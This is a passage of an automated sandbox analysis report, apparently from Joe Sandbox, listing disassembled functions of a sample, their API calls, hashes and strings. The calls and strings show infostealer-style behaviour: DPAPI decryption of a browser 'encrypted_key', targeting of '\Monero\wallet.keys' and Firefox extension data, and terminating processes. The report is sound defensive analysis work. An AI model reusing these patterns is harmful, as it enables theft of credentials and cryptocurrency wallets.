                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                  • String ID: %dx%d
                  • API String ID: 1695172769-2206825331
                  • Opcode ID: 834d08d8b0ef8f6607af76f6b1bd9f4518d37fa9ec73a776cfaf9320346b666f
                  • Instruction ID: e8cf9485563fdad084531af7c4ff7d2d2a78c92a01c05bbcdaf648583639d9ee
                  • Opcode Fuzzy Hash: 834d08d8b0ef8f6607af76f6b1bd9f4518d37fa9ec73a776cfaf9320346b666f
                  • Instruction Fuzzy Hash: 832130B1A40208AFDB04DF94DD45FAEBBB8FB48701F144159F619A7280C77999419BA2
                  Function 00D48D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00D4951E,00000000), ref: 00D48D5B
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00D48D62
                  • wsprintfW.USER32 ref: 00D48D78
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesswsprintf
                  • String ID: %hs
                  • API String ID: 769748085-2783943728
                  • Opcode ID: 22f38379a0ba984f71984899d677777648a4155920c881a0821ec2a81d8da9b4
                  • Instruction ID: d981db67a730bed3978b01c4211eb8670daf2b39eeacac714cca1011a62adf2c
                  • Opcode Fuzzy Hash: 22f38379a0ba984f71984899d677777648a4155920c881a0821ec2a81d8da9b4
                  • Instruction Fuzzy Hash: 43E0ECB5A4020CBFDB14DB94DD0AE6D7BBCEB84702F044194FD0D97280DA719E54ABA7
                  Function 00D3A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                    • Part of subcall function 00D48B60: GetSystemTime.KERNEL32(00D50E1A,00AFA690,00D505AE,?,?,00D313F9,?,0000001A,00D50E1A,00000000,?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D48B86
                    • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                    • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D3A2E1
                  • lstrlen.KERNEL32(00000000,00000000), ref: 00D3A3FF
                  • lstrlen.KERNEL32(00000000), ref: 00D3A6BC
                    • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                  • DeleteFileA.KERNEL32(00000000), ref: 00D3A743
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 7122a964b414726954bf3f1d2f071eae59a116d60e4694c2de093601539bdffb
                  • Instruction ID: eae38fd510842dabaa083300f8d31e3322ad164dc73cfb37da3c4618db5c3a9d
                  • Opcode Fuzzy Hash: 7122a964b414726954bf3f1d2f071eae59a116d60e4694c2de093601539bdffb
                  • Instruction Fuzzy Hash: 85E1ED72850118ABEB15FBA8DC92EEE7338EF54304F518169F516B6091EF306A4DCB72
                  Function 00D3D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                    • Part of subcall function 00D48B60: GetSystemTime.KERNEL32(00D50E1A,00AFA690,00D505AE,?,?,00D313F9,?,0000001A,00D50E1A,00000000,?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D48B86
                    • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                    • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D3D481
                  • lstrlen.KERNEL32(00000000), ref: 00D3D698
                  • lstrlen.KERNEL32(00000000), ref: 00D3D6AC
                  • DeleteFileA.KERNEL32(00000000), ref: 00D3D72B
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: ee392926dfde5d29402c1376b3bf04e4bbd56da528a811036ef5a7e8cfefacb8
                  • Instruction ID: af098c426f7b9fdf2dee618d6c252d65c12d67ffb54557ee3396bca1aa2c27f1
                  • Opcode Fuzzy Hash: ee392926dfde5d29402c1376b3bf04e4bbd56da528a811036ef5a7e8cfefacb8
                  • Instruction Fuzzy Hash: 83912072850118ABEB04FBA8DC92EEE7339EF54304F514569F507B6092EF346A49CB72
                  Function 00D3D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                    • Part of subcall function 00D48B60: GetSystemTime.KERNEL32(00D50E1A,00AFA690,00D505AE,?,?,00D313F9,?,0000001A,00D50E1A,00000000,?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D48B86
                    • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                    • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D3D801
                  • lstrlen.KERNEL32(00000000), ref: 00D3D99F
                  • lstrlen.KERNEL32(00000000), ref: 00D3D9B3
                  • DeleteFileA.KERNEL32(00000000), ref: 00D3DA32
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: fafeca9f6a4a0b536e5985982710c2e9a4faad3cfa0adffd873251538bffc09f
                  • Instruction ID: dc1ade036a89be8e7d23605ca322a674c967e57ca19bad55de2e35bbb6da6f98
                  • Opcode Fuzzy Hash: fafeca9f6a4a0b536e5985982710c2e9a4faad3cfa0adffd873251538bffc09f
                  • Instruction Fuzzy Hash: 80812D728501189BEB04FBA8DC92EEE7339EF54304F514529F407B6092EF346A49CBB2
                  Function 00D3F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                    • Part of subcall function 00D399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D399EC
                    • Part of subcall function 00D399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D39A11
                    • Part of subcall function 00D399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00D39A31
                    • Part of subcall function 00D399C0: ReadFile.KERNEL32(000000FF,?,00000000,00D3148F,00000000), ref: 00D39A5A
                    • Part of subcall function 00D399C0: LocalFree.KERNEL32(00D3148F), ref: 00D39A90
                    • Part of subcall function 00D399C0: CloseHandle.KERNEL32(000000FF), ref: 00D39A9A
                    • Part of subcall function 00D48E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00D48E52
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                    • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                    • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00D51580,00D50D92), ref: 00D3F54C
                  • lstrlen.KERNEL32(00000000), ref: 00D3F56B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                  • String ID: ^userContextId=4294967295$moz-extension+++
                  • API String ID: 998311485-3310892237
                  • Opcode ID: 2afca6ef17628f6599d288b5fcc470358ad3a5ceb92dcc25ee9d4fcf8cf5c147
                  • Instruction ID: 64262da635bab3ede67b9b30719bd6d0caffa6b47d3c2ee75031b8187d4dbb64
                  • Opcode Fuzzy Hash: 2afca6ef17628f6599d288b5fcc470358ad3a5ceb92dcc25ee9d4fcf8cf5c147
                  • Instruction Fuzzy Hash: 9B511E76D50108ABEB14FBA8DC96DED7338EF54304F408528F816A7191EE346A0DCBB2
                  Function 00D43560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen
                  • String ID:
                  • API String ID: 367037083-0
                  • Opcode ID: f54b29ac73871c0a04edc18f0bfac55f231fe61d9808f4dee9fefe7beccb48ee
                  • Instruction ID: e3252581e48ac3b64eee8fcf5c086a89a4a0b96b8e6c1a9030693bbe57ad9c34
                  • Opcode Fuzzy Hash: f54b29ac73871c0a04edc18f0bfac55f231fe61d9808f4dee9fefe7beccb48ee
                  • Instruction Fuzzy Hash: 6E412D71D14209AFDF04EFA8D845AEEB774EF54304F148018E81676291DB75AA49CFB2
                  Function 00D39CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                    • Part of subcall function 00D399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D399EC
                    • Part of subcall function 00D399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D39A11
                    • Part of subcall function 00D399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00D39A31
                    • Part of subcall function 00D399C0: ReadFile.KERNEL32(000000FF,?,00000000,00D3148F,00000000), ref: 00D39A5A
                    • Part of subcall function 00D399C0: LocalFree.KERNEL32(00D3148F), ref: 00D39A90
                    • Part of subcall function 00D399C0: CloseHandle.KERNEL32(000000FF), ref: 00D39A9A
                    • Part of subcall function 00D48E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00D48E52
                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00D39D39
                    • Part of subcall function 00D39AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D34EEE,00000000,00000000), ref: 00D39AEF
                    • Part of subcall function 00D39AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00D34EEE,00000000,?), ref: 00D39B01
                    • Part of subcall function 00D39AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D34EEE,00000000,00000000), ref: 00D39B2A
                    • Part of subcall function 00D39AC0: LocalFree.KERNEL32(?,?,?,?,00D34EEE,00000000,?), ref: 00D39B3F
                    • Part of subcall function 00D39B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00D39B84
                    • Part of subcall function 00D39B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00D39BA3
                    • Part of subcall function 00D39B60: LocalFree.KERNEL32(?), ref: 00D39BD3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                  • String ID: $"encrypted_key":"$DPAPI
                  • API String ID: 2100535398-738592651
                  • Opcode ID: 45947749e35a5d86b88133521fa46e8c2bcce305c84509f8fb3131e7e9c47752
                  • Instruction ID: 3386afe1a046563345dd6d9b658a8afb352d783df97a6d871da33d27b4323f15
                  • Opcode Fuzzy Hash: 45947749e35a5d86b88133521fa46e8c2bcce305c84509f8fb3131e7e9c47752
                  • Instruction Fuzzy Hash: 0C312FB6D10209ABCF14DBE4DC96AEEB7B8EF48304F184519E905A7241EB749A05CBB1
                  Function 00D494D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 00D494EB
                    • Part of subcall function 00D48D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00D4951E,00000000), ref: 00D48D5B
                    • Part of subcall function 00D48D50: RtlAllocateHeap.NTDLL(00000000), ref: 00D48D62
                    • Part of subcall function 00D48D50: wsprintfW.USER32 ref: 00D48D78
                  • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00D495AB
                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00D495C9
                  • CloseHandle.KERNEL32(00000000), ref: 00D495D6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                  • String ID:
                  • API String ID: 3729781310-0
                  • Opcode ID: a27d52a7d7122ba96822e69f7c3be9c23a46cd3029bfcd09e6f74f5ee4a92bc7
                  • Instruction ID: d26e770e45544a0e22e812f5b9e0b034061aeda74352929f9dd5df38adc15a42
                  • Opcode Fuzzy Hash: a27d52a7d7122ba96822e69f7c3be9c23a46cd3029bfcd09e6f74f5ee4a92bc7
                  • Instruction Fuzzy Hash: 35312D71E0024C9FDB14DFE0CD59BEEB778FB44301F204559E50AAB184DB74AA89DB62
